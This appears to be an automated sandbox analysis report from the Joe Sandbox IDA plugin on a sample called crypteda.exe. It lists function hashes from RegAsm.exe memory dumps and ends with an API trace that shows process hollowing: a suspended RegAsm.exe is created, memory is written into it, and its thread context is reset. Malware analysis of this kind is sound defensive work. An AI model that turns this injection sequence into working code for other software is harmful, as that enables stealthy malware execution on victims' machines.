Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea6e5453806d291da88bc5ee5a08a5e93e800216572903791bf1eb9b9afd2cbe
Instruction ID: a4a0e48ed589e4eca9d569b68ac33a436f49bffc2de4b55e7194af1736c29894
Opcode Fuzzy Hash: ea6e5453806d291da88bc5ee5a08a5e93e800216572903791bf1eb9b9afd2cbe
Instruction Fuzzy Hash: C0F024B0D04204DFD751DB60D8507A97BB0EB51314F0142DAE4888B7E8D7389E04CB80

Function 066656B2 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2851051131.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6660000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: addf5a065080ef25e74b7042713294159e510ba875984b9aed219afa908c4ae6
Instruction ID: 8f27f8cf7ab7fd371711d8bd4771f7159a331770c6507eaa39f0ee0d4e81b232
Opcode Fuzzy Hash: addf5a065080ef25e74b7042713294159e510ba875984b9aed219afa908c4ae6
Instruction Fuzzy Hash: F0F05875D042599ECB40EFBCD9055EEBFB0AF45200F10816AD559E7210E3309A66CFD1

Function 063CB4C8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83c9d1d1bbe3f85e26cccd2ea97a05140e17acff55da4279554b33cdf018dcd1
Instruction ID: 342e0b26324f57c5732bf171f80a057e60b5af26d3604292e8f7ca8f1bbd11ec
Opcode Fuzzy Hash: 83c9d1d1bbe3f85e26cccd2ea97a05140e17acff55da4279554b33cdf018dcd1
Instruction Fuzzy Hash: D6E01231200100ABC7546E9AB589A9F7AEFEFCA761F40453DF20ED3246CE65680987B5

Function 063CAF40 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbba993c8f1d32e9ac43beaa9102fe2044dabd15d682346a79c1448ee6abfc83
Instruction ID: 23ab4d60b21fe4e2d8369361195e186be71335d9d80e4268923eaedddc7f5bcd
Opcode Fuzzy Hash: bbba993c8f1d32e9ac43beaa9102fe2044dabd15d682346a79c1448ee6abfc83
Instruction Fuzzy Hash: 47E092313452A51FCB1B173978588AE7FAEDAC6511348009BF687C7282CE245A0583E5

Function 063CC450 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31c85595d6b624515cc91755edb2301216302b660bea0b4e4ffa647d654e163a
Instruction ID: 8050e49a4d3a6277f37c5f641204fd59cd2fc59fafbb807e3ff5fb756bb47398
Opcode Fuzzy Hash: 31c85595d6b624515cc91755edb2301216302b660bea0b4e4ffa647d654e163a
Instruction Fuzzy Hash: 4FF09A71500B01CFD725EF26E548566BBF6FB88315700C62EE84B83A59DF70A54ACF84

Function 06664620 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2851051131.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6660000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d8381498b8b2dff6c33ea0f0c9aa3f27ec380cd30a171792c9e21ed42e5358f
Instruction ID: c9f84d1126a1abcb03ffe1f73ad0cd8ceee68e4ec69e6d1f47fb56788fccb9e7
Opcode Fuzzy Hash: 2d8381498b8b2dff6c33ea0f0c9aa3f27ec380cd30a171792c9e21ed42e5358f
Instruction Fuzzy Hash: 35E09A313092A0AFC3054A29D8048967BBADBCA621319009BE448C7222CA619C0683A1

Function 063CB7D0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8652fe04033d9e55b8e42b3e9caf49a49e6affc0c15c0c2275549b1456eb007b
Instruction ID: b11196826277b17d2f05543dedc33cfe96d0143608b5fdf52b876380a1495a75
Opcode Fuzzy Hash: 8652fe04033d9e55b8e42b3e9caf49a49e6affc0c15c0c2275549b1456eb007b
Instruction Fuzzy Hash: C7F03935D0020CEFCB41DFB4D9488CDBBB9EB44300F1082AAE805E3244EA305B55DF90

Function 063CC3F0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2884ca1eea92a3c46ed4e82bf71ca55ebd5591e886ad3255454851a5961ff3b0
Instruction ID: 3de9432522cbdcc4c417125e8f6b5a163692207729f715061eb9efc4041cca2d
Opcode Fuzzy Hash: 2884ca1eea92a3c46ed4e82bf71ca55ebd5591e886ad3255454851a5961ff3b0
Instruction Fuzzy Hash: 13E0A0302007908FC210AB6DF50879E7BEADF81318F04442DE14687645CBA5A8058BB1

Function 0666DEFE Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2851051131.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6660000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2518f14cbf4365096fafc89454569b2aa9764bbac28e7886b599f80f6223ddab
Instruction ID: f14ce83e58ee541ff6f716ef8b7943315f3c1704e572d5d5747733211b8c0aef
Opcode Fuzzy Hash: 2518f14cbf4365096fafc89454569b2aa9764bbac28e7886b599f80f6223ddab
Instruction Fuzzy Hash: 4BF0F870E012098FDF58CFA6E00866DBBF1AF85311F008069E40997250DA359940CF91

Function 0666CEFA Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2851051131.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6660000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc2a5bc45e8afeaaee949bba209b80bfed8480a58875bfc1b5d65e12a99ac710
Instruction ID: dc3608619ceac4f89c1bf66d2f50268c8ce07a3f804338210a920b8360494b92
Opcode Fuzzy Hash: bc2a5bc45e8afeaaee949bba209b80bfed8480a58875bfc1b5d65e12a99ac710
Instruction Fuzzy Hash: 5BE04F313545209FCB14AF6DE448C5537EDEF49A2130100A9F50ACB331DA61DC40CBD4

Function 066656C0 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2851051131.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6660000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f0b2a72d2194e34ab6295b0eced9e4f6453620cf51accdd080d92bf2315334e
Instruction ID: e2a5fc3f3dab65943dadae092f08d94cc5a381b87eb7734fb4f0badd79f26a7b
Opcode Fuzzy Hash: 3f0b2a72d2194e34ab6295b0eced9e4f6453620cf51accdd080d92bf2315334e
Instruction Fuzzy Hash: 7CF01571C002198FCB40EFACD9015DEBBF4AF05210F508126D909E7210E6309A558BC1

Function 06661D48 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2851051131.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6660000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 261c6d0286d7c381d85b8bf83faf7babae7b77ec8b95467017883063327161f3
Instruction ID: c5b27b3117f9f45c84ae8c689ba2e0d24f5e79bdcd3d681711ce78cbf9293073
Opcode Fuzzy Hash: 261c6d0286d7c381d85b8bf83faf7babae7b77ec8b95467017883063327161f3
Instruction Fuzzy Hash: 26E0263362852607E765129DF0043B5B29DCB81220F444033E10CCBF44C994985547E0

Function 06666360 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2851051131.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6660000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f991f5440ba7d72d06c96d7d2e297eae21cfb18b7ceff283d7122c0a6a811b05
Instruction ID: 6d2327dffda430a0859c5f805108776ed88694473b7233a180c0975e25bcba75
Opcode Fuzzy Hash: f991f5440ba7d72d06c96d7d2e297eae21cfb18b7ceff283d7122c0a6a811b05
Instruction Fuzzy Hash: 8BE02031905254EFC3019B64D4154C1BF78EF0A60431145DBE458CF322D732DC01CBE1

Function 063C5698 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eefbfca6bb1bd36e3b462b6007448302b74801eb01ad07167955737929eabb9
Instruction ID: 0a901431c89742ade2cc75752e5865eb1dece9e518033ac2c8f499957dc8f4ae
Opcode Fuzzy Hash: 1eefbfca6bb1bd36e3b462b6007448302b74801eb01ad07167955737929eabb9
Instruction Fuzzy Hash: B7E092B210C3009FD3049B24EC168967BA8EB95220B05886EF080C7145E671E855C7A5

Function 063CCF10 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a213a282d16f39e19cc31b1cc64138e4942d22c3e31757e3dc571a0afd62f8b8
Instruction ID: 40ccd4d2cb70eac379b1fd3e336d39b1cd2dd304040377bfee77befa952a89e8
Opcode Fuzzy Hash: a213a282d16f39e19cc31b1cc64138e4942d22c3e31757e3dc571a0afd62f8b8
Instruction Fuzzy Hash: A7E0D8329092804FC743EF3CB85049E7FB1DE5752435287EDE04AC764AD5304C0587E5

Function 063C9248 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca9d4aa228e59eb17b199c2bc539c56cd5307d03c64c6a929dfbfd16ef816010
Instruction ID: 451fe59a4dd19107ec4840b0913cd68487e0d7ba2c96c07b1ee2aa2924b3b41d
Opcode Fuzzy Hash: ca9d4aa228e59eb17b199c2bc539c56cd5307d03c64c6a929dfbfd16ef816010
Instruction Fuzzy Hash: 18F03074E00308EFC754EF64D940B9D77B1AB44314F1082A8D44897398D7745D44CBC0

Function 063CE4BF Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1723fcfaec10c7ae25b0f600e7368ca9581b0e95b79d227969126ae89447dff3
Instruction ID: 8d3865a456ad051f21ad94d1141865222217476faa173283a56600b390cbe870
Opcode Fuzzy Hash: 1723fcfaec10c7ae25b0f600e7368ca9581b0e95b79d227969126ae89447dff3
Instruction Fuzzy Hash: A0E0D871909204FFCB01CF68E9008AD3BB5DA8220472043DAE409E33A5D5304F148BA1

Function 063CE540 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc8230fad8943aafcc66927e59b8335f41eda39b3ce03a9335831cb51a6e7d1d
Instruction ID: e28e465f52031a5a9a584e3aa587946d5ec276f9e75943ccff2d85e6f7eef3af
Opcode Fuzzy Hash: dc8230fad8943aafcc66927e59b8335f41eda39b3ce03a9335831cb51a6e7d1d
Instruction Fuzzy Hash: A6E0D8224083804FC716E638AF5345D3F70DA5B508703469DDC858B6AAD6544E0987E7

Function 066659D3 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2851051131.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6660000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb88d5ffe561ca1440f91bae6aa992b62992bf54cd17f87e8a492e0c96710785
Instruction ID: 6a56222b0af6c97eeedd669da4d8a6c6f5abfb9db02a8f03a9284ef14667e21d
Opcode Fuzzy Hash: bb88d5ffe561ca1440f91bae6aa992b62992bf54cd17f87e8a492e0c96710785
Instruction Fuzzy Hash: 62E0927094878BCFD741DF61D00599DBFB1AF85314F240A5AF447AB650CB344A82CB91

Function 063CAF50 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e9809b8166a54847d397c2ba8312e6f9c01916dbf47013a44a931d8ac8f69a8
Instruction ID: 89dd7fe0d3e9701ccf68cc1c1c89add84b76999a22ed1877198b994a566f78cc
Opcode Fuzzy Hash: 6e9809b8166a54847d397c2ba8312e6f9c01916dbf47013a44a931d8ac8f69a8
Instruction Fuzzy Hash: D1D05E31300129578E0A276DB4988AE7BAFEBC5662700102AF70BD7280CE755D0687E9

Function 063CEBB8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eacc6167cd1d872bd75a2220a939b5df8fbdaf8b17c24c70d10242806364b4a5
Instruction ID: 14b6f2360fd3b59fc49da91b57a5ccbe07f08b402f1bfc9e78735b73e19b5b3d
Opcode Fuzzy Hash: eacc6167cd1d872bd75a2220a939b5df8fbdaf8b17c24c70d10242806364b4a5
Instruction Fuzzy Hash: DDE0EC3A25D3549FC7429F58D8408653FB5FF5A61134440DEF6828F663C6219C25DBA0

Function 06664630 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2851051131.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6660000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3566a51ec4bb1fadaeac79b4aaa2a1acff5f716bd05ab7e34dfe1b6320b425c
Instruction ID: d8502cf0434f7b87cbcdd4676a05c2d436990775c2f89f698f74234bb9bb09c8
Opcode Fuzzy Hash: c3566a51ec4bb1fadaeac79b4aaa2a1acff5f716bd05ab7e34dfe1b6320b425c
Instruction Fuzzy Hash: F5D017327101209F86049A5EE40486ABBEFEFC966132540ABE109C7322CAA1EC028790

Function 063CB7E0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b10307b8dfc4aa8f6a21a81579b9fce18d061ac339821ac1343a9ce7ad8e97f0
Instruction ID: 659b1fa884babc99b53e18dcd78985c92d1d3a63547ea7b816da19b1fa4984df
Opcode Fuzzy Hash: b10307b8dfc4aa8f6a21a81579b9fce18d061ac339821ac1343a9ce7ad8e97f0
Instruction Fuzzy Hash: 59E09275D0020CEFCB41DFE4E9848DDBBB9EB48300F1082AAD809A3204EB306B55DF90

Function 063CE4D0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2c42eccbbf42b22f2559d26e693b47444d835ce373f054cf756c1eabcd4e644
Instruction ID: 8218278fcde419df30724695ad07a0514d976daf33847c1e2b92c1c9e1ce5799
Opcode Fuzzy Hash: e2c42eccbbf42b22f2559d26e693b47444d835ce373f054cf756c1eabcd4e644
Instruction Fuzzy Hash: E1D01271A0010CFF8B40DFA8E90195D77B9DB45204B1041A99408D3355DA315F009BA0

Function 063CFBAB Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f55e44fe2680af52b74a24fa202af2f5f79bf1b53466d900582b48ef198fb28b
Instruction ID: 7632e0fd861610d9a0d445ac57d87fff807790d9de450b65bdb1e527b4a60c80
Opcode Fuzzy Hash: f55e44fe2680af52b74a24fa202af2f5f79bf1b53466d900582b48ef198fb28b
Instruction Fuzzy Hash: 9AC012327040208B0284AA6C70140AE6AD7E2C82A3386403EF60EE7389CD608C424BB4

Function 06664A00 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2851051131.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6660000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6ca3bc48b4dd268f8cb5c9bd47460867f3aaf08ae81d020fd35fa529edc1810
Instruction ID: 73cdf63d51d922bd87782504525be2a5f38040f5bd891ea1ef5d9348b947962a
Opcode Fuzzy Hash: c6ca3bc48b4dd268f8cb5c9bd47460867f3aaf08ae81d020fd35fa529edc1810
Instruction Fuzzy Hash: C4C08C3800E3813EC2431A31DC10CD77FBA6E56210F05868AB0E8561B2C336446C83BB

Function 06661B99 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2851051131.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6660000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1a9e4e1df8cb21fc4e9ec3eb445ec47e5f92a5ca6d380de3d1ac401ae0d6d1d
Instruction ID: 2cec1ccf16db0d1b18bdff3c48c6367f49140e7b9deb3d05e1e4a2e2c4ddf1ec
Opcode Fuzzy Hash: c1a9e4e1df8cb21fc4e9ec3eb445ec47e5f92a5ca6d380de3d1ac401ae0d6d1d
Instruction Fuzzy Hash: D3D05E3050A2D19FCB06AB24FF647053F699F0230AF06A4DAE1404F15BD7788604C792

Function 0666ACD0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2851051131.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6660000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc4d9b96690029b07528ae533cc4156712b65cbfad6cd62e778b808970ea1137
Instruction ID: 8c5bdf3369b6fab19b63c60364015867cbec4ce91f7bfb3ffd97eed2c23165ac
Opcode Fuzzy Hash: fc4d9b96690029b07528ae533cc4156712b65cbfad6cd62e778b808970ea1137
Instruction Fuzzy Hash: 59C08C30590109CFC740BBA5F00889837A9FF9822A3114090F60D8F731EB22EC00CA80

Function 0666041E Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2851051131.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6660000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a68dc76b187e3c9c5c46ecf23beb97f1af440e80c29439e67dc1968ec0d5980c
Instruction ID: af442b22ef27d8906538298658b66037202c1e3b2ae28ab5a8528d37bf146bd0
Opcode Fuzzy Hash: a68dc76b187e3c9c5c46ecf23beb97f1af440e80c29439e67dc1968ec0d5980c
Instruction Fuzzy Hash: E7D0C97094520ACFEB25DF51D269BBE7B71EF14308F600428E101BA652C7B68A5ACBD1

Function 063C3721 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3658847689e35cb070fb5f9e1c49c4142714d6d547f21b8f5ee3fcb3dbb5c124
Instruction ID: 64acb57687830e01150e2bbc27ba53fab79aa1d7fc17728ff60943fe2ab24775
Opcode Fuzzy Hash: 3658847689e35cb070fb5f9e1c49c4142714d6d547f21b8f5ee3fcb3dbb5c124
Instruction Fuzzy Hash: 5BC08C2114A3C12FE3020B205C12A927F744B82210B0A408BE6C1DA083C698406CD7B2

Non-executed Functions

Function 066A2E88 Relevance: 2.7, Strings: 2, Instructions: 202COMMON

Download Yara Rule

Strings

$]q, xrefs: 066A3039
$]q, xrefs: 066A2F7B

Memory Dump Source

Source File: 00000009.00000002.2851252538.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_66a0000_RegAsm.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 64e53a1ad5015af70860022138b4002c5ddf33e3547a706e8a239509945ff5d0
Instruction ID: b2e9d61b28aa6290e90e36972be142a07f0b04c631b1330c4ae0fd5848b7b4ef
Opcode Fuzzy Hash: 64e53a1ad5015af70860022138b4002c5ddf33e3547a706e8a239509945ff5d0
Instruction Fuzzy Hash: 8761AC74E002089FDB44DFA9C980ADDBBB2EF89300F249169E405BB365DB35A986CF54

Function 066A3158 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2851252538.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_66a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc33405c3c27c5c0a3dd7f17f2cc7edd6c0573d026ca1737cd0b6282a3fc39f8
Instruction ID: cf2595fe624bf3f26e31114f9717f13e519b022be0dd55c3503c7aeab3bbf2bf
Opcode Fuzzy Hash: fc33405c3c27c5c0a3dd7f17f2cc7edd6c0573d026ca1737cd0b6282a3fc39f8
Instruction Fuzzy Hash: E8010434E45308EFCB01CBA4D841AEDFBB5EB4A311F10919AE819AB362C6319D11CFA0

Function 066AE844 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2851252538.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_66a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f20ba364341507501d623b5f40d385907e5eeb9ae6fa2ea88638114ad5d7478d
Instruction ID: ca162be69e005fdeb2b10fc2a355107bcf9b9917163092520d3246fd84a7f92a
Opcode Fuzzy Hash: f20ba364341507501d623b5f40d385907e5eeb9ae6fa2ea88638114ad5d7478d
Instruction Fuzzy Hash: D8F0C270C4431AEEEB649F50D898BBEBA70AF06305F102459C006B3690CBB54A85EF94

Function 066AB9EB Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2851252538.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_66a0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 649499ed41c41394175e5a9117bf71e8be6b0ec9630a8921404d2dcb241c6e9e
Instruction ID: 6ab2fcb728fe8feb676403dd84e042ee4e779cdf260048afea2f92518c337b45
Opcode Fuzzy Hash: 649499ed41c41394175e5a9117bf71e8be6b0ec9630a8921404d2dcb241c6e9e
Instruction Fuzzy Hash: 79E0ED70D5920EDEEB548F51C1157BFF671BB46204F609485880573244DB744A458EA6

Function 063CEFD0 Relevance: 7.9, Strings: 6, Instructions: 380COMMON

Download Yara Rule

Strings

(_]q, xrefs: 063CF33A
(_]q, xrefs: 063CF0B9
(_]q, xrefs: 063CF239
(_]q, xrefs: 063CF1BA
(_]q, xrefs: 063CF3B9
(_]q, xrefs: 063CF03A

Memory Dump Source

Source File: 00000009.00000002.2850504533.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_63c0000_RegAsm.jbxd

Similarity

API ID:
String ID: (_]q$(_]q$(_]q$(_]q$(_]q$(_]q
API String ID: 0-414434136
Opcode ID: 02ef2c28148311683e378512a96c336fc7e5405803020fb5e8ba06314bcfb9e2
Instruction ID: c60a2d5890366f28762094ed0312b58318483166d7bc424946dbc843f6f95a08
Opcode Fuzzy Hash: 02ef2c28148311683e378512a96c336fc7e5405803020fb5e8ba06314bcfb9e2
Instruction Fuzzy Hash: DFD1BF75B042449FCB459F68C81456E7FB2EF86310F2485AEE806DB382DE359D06CBE1

Analysis Process: crypteda.exePID: 2448, Parent PID: 6664COMMON

Execution Graph

Execution Coverage:	28.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	20
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0258255D Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,025824CF,025824BF), ref: 025826CC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 025826DF
Wow64GetThreadContext.KERNEL32(000002EC,00000000), ref: 025826FD
ReadProcessMemory.KERNELBASE(000002F0,?,02582513,00000004,00000000), ref: 02582721
VirtualAllocEx.KERNELBASE(000002F0,?,?,00003000,00000040), ref: 0258274C
WriteProcessMemory.KERNELBASE(000002F0,00000000,?,?,00000000,?), ref: 025827A4
WriteProcessMemory.KERNELBASE(000002F0,00400000,?,?,00000000,?,00000028), ref: 025827EF
WriteProcessMemory.KERNELBASE(000002F0,?,?,00000004,00000000), ref: 0258282D
Wow64SetThreadContext.KERNEL32(000002EC,02510000), ref: 02582869
ResumeThread.KERNELBASE(000002EC), ref: 02582878

Strings

ress, xrefs: 025825E7
aryA, xrefs: 025825A3
ReadProcessMemory, xrefs: 0258264A
VirtualAllocEx, xrefs: 0258265D
